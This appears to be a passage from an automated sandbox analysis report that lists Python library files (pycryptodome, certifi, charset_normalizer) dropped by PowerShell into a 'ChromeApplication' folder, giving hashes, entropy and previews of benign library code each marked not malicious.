                                                                                                                                                                                                  SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                                  MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                                  SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                                  SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                                  SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\py3compat.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6010
                                                                                                                                                                                                  Entropy (8bit):4.8279694547928065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                                  MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                                  SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                                  SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                                  SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\py3compat.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):870
                                                                                                                                                                                                  Entropy (8bit):4.791491758318878
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                                  MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                                  SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                                  SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                                  SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\strxor.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5587
                                                                                                                                                                                                  Entropy (8bit):4.7939511946106
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                                  MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                                  SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                                  SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                                  SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\strxor.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):249
                                                                                                                                                                                                  Entropy (8bit):4.800678842548869
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                                  MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                                  SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                                  SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                                  SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):191
                                                                                                                                                                                                  Entropy (8bit):4.787641890602914
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qXVLCVDvRqvljhfxXFqYLULZ:UvZdK0pAlV/kCAZ4sdXcVz8ljZRFqI5y
                                                                                                                                                                                                  MD5:CAAC9B613D9F7C76FBB1F59F51BBC300
                                                                                                                                                                                                  SHA1:B085C149A8C6051BE179605BA05E49FDC46ACC7D
                                                                                                                                                                                                  SHA-256:73CF19A80E8AAA2D38047F8D4600D5239F9311AA76D68EC430079E44963B6FA6
                                                                                                                                                                                                  SHA-512:EF4DD006C4B3CFD5C48F94F094C3D3A02FA5A5D8185E13203A7E6715CD64CFA98E9A34764364D08AF0C959A23A700E12AC2E404AD322491CA38E75F0B3FD80CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 20, '0')....__version__ = ".".join([str(x) for x in version_info])..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\__init__.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                  Entropy (8bit):4.320003818965119
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                                                                                  MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                                                                                  SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                                                                                  SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                                                                                  SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.9654096

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7584
                                                                                                                                                                                                  Entropy (8bit):5.0759574908978955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WcgPE5vfnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:Oyvfnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                  MD5:80BC6511BF6C938B33047E6AD0FE61C4
                                                                                                                                                                                                  SHA1:332ADDD7542ED44D0EC3453532A8DCDFDBABE88F
                                                                                                                                                                                                  SHA-256:F9A8467A0AF35416B8C0DB601F12F0E68788DE6F02906E742F3AF3E6E1AEC7F5
                                                                                                                                                                                                  SHA-512:C6DC0F04F06B596A510992E941A1C6DFFBA33AC06167D511C96BCDFAD11C2B3B2D14224F8D9C0121A57B595BD7652473A7554810D59163B02D8CC2C8315275A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......0g.f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....]C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\certifi\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):94
                                                                                                                                                                                                  Entropy (8bit):4.540785862491583
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1LGzbQbAwLSkTRFo+HGip4TjLvf0n:1LcQbjrRJGA4Tfcn
                                                                                                                                                                                                  MD5:D55B9B12960DB04D3C358F429B5E858F
                                                                                                                                                                                                  SHA1:33E92FDF397E4E36A738BAEF1C0F23A3AEACF424
                                                                                                                                                                                                  SHA-256:A7F19866B8D4C0F0548692E5099A066F49A2281292A83032642E43BC8BAA6C74
                                                                                                                                                                                                  SHA-512:BD86630643723CE20C8FACD6AC54740BAD539CE5E6CCCB65CC3F25E1CB56EF6516C9D5B83799EF3BE675B700BED8AD3CDAAAFF64607EDB3D035DF5AE07A71075
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from .core import contents, where..__all__ = ["contents", "where"].__version__ = "2024.08.30".

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\certifi\__main__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):243
                                                                                                                                                                                                  Entropy (8bit):4.451797874382859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
                                                                                                                                                                                                  MD5:269E7F0CA2FA570B10E690595E6AEDAB
                                                                                                                                                                                                  SHA1:F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
                                                                                                                                                                                                  SHA-256:C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
                                                                                                                                                                                                  SHA-512:01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\certifi\cacert.pem

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):299427
                                                                                                                                                                                                  Entropy (8bit):6.047872935262006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                  MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                  SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                  SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                  SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\certifi\core.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4426
                                                                                                                                                                                                  Entropy (8bit):4.499383603039266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+zn9FkdjbY7xDh07FkFDbq7LItY03xWtVwuZprf3:+zPkhGDh0BkpaIu03skun3
                                                                                                                                                                                                  MD5:E41003E9791742059C2298D07A1E828B
                                                                                                                                                                                                  SHA1:1F4014D3956D5773FAA402212DF114AC63168FFA
                                                                                                                                                                                                  SHA-256:A910C31725D52704C1FC49A81A9A5A5D4FD1F6A099BE197E133C4F32E5779D30
                                                                                                                                                                                                  SHA-512:BD979394AF16B7B62490ED580883763533121379428E8CE824C766B3AA0CD5FABD095BEBF76561C23BE14080446975B8198FED81F1FD401690D27B9BA06DE6E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import sys.import atexit..def exit_cacert_ctx() -> None:. _CACERT_CTX.__exit__(None, None, None) # type: ignore[union-attr]...if sys.version_info >= (3, 11):.. from importlib.resources import as_file, files.. _CACERT_CTX = None. _CACERT_PATH = None.. def where() -> str:. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it retu

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1623
                                                                                                                                                                                                  Entropy (8bit):5.323138942576867
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:puqAQwyptdi1RLhwwl1/DfV8Vgja5HlN8aB:puqAQw9q21/DfV8Sa2aB
                                                                                                                                                                                                  MD5:A99E49E46791D457E956314E73C8BCD2
                                                                                                                                                                                                  SHA1:8EFCCB21F10F9CCAAC0FF8D5A09DC0BBD260535A
                                                                                                                                                                                                  SHA-256:9B571412C6FD2B9BFCDF59BD3FF96FD8995410A0FB321C4BEDFC70DE19FBE68E
                                                                                                                                                                                                  SHA-512:EDE2F24B335C2D43C9DF86B865A06E932B884EAD68747F79893F6C00D99DB9A97BD1C9B7A529183278BE0CA78E8E3A798A221C35FCF92335F671510CA993412B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-.."""..Charset-Normalizer..~~~~~~~~~~~~~~..The Real First Universal Charset Detector...A library that helps you read text from an unknown charset encoding...Motivated by chardet, This package is trying to resolve the issue by taking a new approach...All IANA character set names for which the Python core library provides codecs are supported.....Basic usage:.. >>> from charset_normalizer import from_bytes.. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')).. >>> best_guess = results.best().. >>> str(best_guess).. 'B.... ..... ... ..... .. ............ O............!'....Others methods and usages are available - see the full documentation..at <https://github.com/Ousret/charset_normalizer>...:copyright: (c) 2021 by Ahmed TAHRI..:license: MIT, see LICENSE for more details..."""..import logging....from .api import from_bytes, fro

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\__main__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                  Entropy (8bit):4.168966465012458
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1LGGMHRYF0AnrjhAjpv/Fhq0AHy:1LCxgNFAjpH7q0
                                                                                                                                                                                                  MD5:A7BB1AAA21433C358CD1B40294C6627E
                                                                                                                                                                                                  SHA1:8C1F3F49FCABE5D1F2AFD9B607D5F8B1C0CAE96D
                                                                                                                                                                                                  SHA-256:9D59CCA37D614CF376632D38E46248BC78F774A0C9CF8740411DDC51276F6327
                                                                                                                                                                                                  SHA-512:D7324A84DCC20C30F722E481DC1D84D322A8CE84DD4CF0798F4ABEACA1DBBB6872C626521AF877D19798351B6A1900F1EEAC71FEEB0F83A3E21EE9AA056124D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from .cli import cli_detect....if __name__ == "__main__":.. cli_detect()..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\api.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21723
                                                                                                                                                                                                  Entropy (8bit):4.344893314336944
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p2x1hvkZ+5NKZOptbYe5pNjxaC6FeMLMNIo7g7ZSKF:Ax1hcZ+5N/pJPpNjn6FeNb7cZSKF
                                                                                                                                                                                                  MD5:3DCEEAA50D7F4FECF99A18787955C802
                                                                                                                                                                                                  SHA1:298156169704CF6F1E34722625D029AA0A4D3F24
                                                                                                                                                                                                  SHA-256:A852F47EB52B71F718109986A6AA09E007FAF13A15B9EDDFE522B5829F140B94
                                                                                                                                                                                                  SHA-512:AC1F37A7BDD8E7DBFBE6F4F242D30E2D8F72F80B1708D69360C841BDB756B7BCAFEBB4DED5BF24EC1AA3FBD85370F6BA63D7CAB5C42B9B12AAAFB91B06596C83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import logging..from os import PathLike..from typing import BinaryIO, List, Optional, Set, Union....from .cd import (.. coherence_ratio,.. encoding_languages,.. mb_encoding_languages,.. merge_coherence_ratios,..)..from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE..from .md import mess_ratio..from .models import CharsetMatch, CharsetMatches..from .utils import (.. any_specified_encoding,.. cut_sequence_chunks,.. iana_name,.. identify_sig_or_bom,.. is_cp_similar,.. is_multi_byte_encoding,.. should_strip_sig_or_bom,..)....# Will most likely be controversial..# logging.addLevelName(TRACE, "TRACE")..logger = logging.getLogger("charset_normalizer")..explain_handler = logging.StreamHandler()..explain_handler.setFormatter(.. logging.Formatter("%(asctime)s | %(levelname)s | %(message)s")..)......def from_bytes(.. sequences: Union[bytes, bytearray],.. steps: int = 5,.. chunk_size: int = 512,.. threshold: float = 0.2,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\cd.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12955
                                                                                                                                                                                                  Entropy (8bit):4.565085883136704
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:auWIiX1vR2Yf2bb6WjCKJdnZsisOQ07Tzfh+3gnfmus+rt5E/t7RV:ayiXF+Pp7Tzfh+wnfmufrt5E/t7RV
                                                                                                                                                                                                  MD5:743B974C6FFEB35D433C276B344A1140
                                                                                                                                                                                                  SHA1:F1CA137C1BA5049C0AB7661DE0E66F4C51F03DD8
                                                                                                                                                                                                  SHA-256:61F937B1B79ED17AA8D7EBE64186CEA8CE75F926A35CF2F31551BCF674EC6737
                                                                                                                                                                                                  SHA-512:26497E2EFA6761838067810097FE8B355AB5E838C3DBA908EA0240B158CB47B13717942B32F15A9AE8B3EBAFE2029412B9A777C7485F91A48A03D1892EBACE64
                                                                                                                                                                                                  Malicious:false
